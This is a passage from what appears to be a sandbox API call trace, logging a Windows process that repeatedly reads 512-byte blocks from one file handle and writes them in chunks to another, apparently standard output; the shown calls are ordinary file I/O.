lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.972] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] GetFileType (hFile=0x50) returned 0x1 [0132.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.973] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.973] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.974] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] GetFileType (hFile=0x50) returned 0x1 [0132.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.974] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.975] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] GetFileType (hFile=0x50) returned 0x1 [0132.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.975] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.975] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] GetFileType (hFile=0x50) returned 0x1 [0132.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.976] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.976] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] GetFileType (hFile=0x50) returned 0x1 [0132.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.977] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.977] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.977] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] GetFileType (hFile=0x50) returned 0x1 [0132.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.978] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.978] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.978] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] GetFileType (hFile=0x50) returned 0x1 [0132.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.979] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.979] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 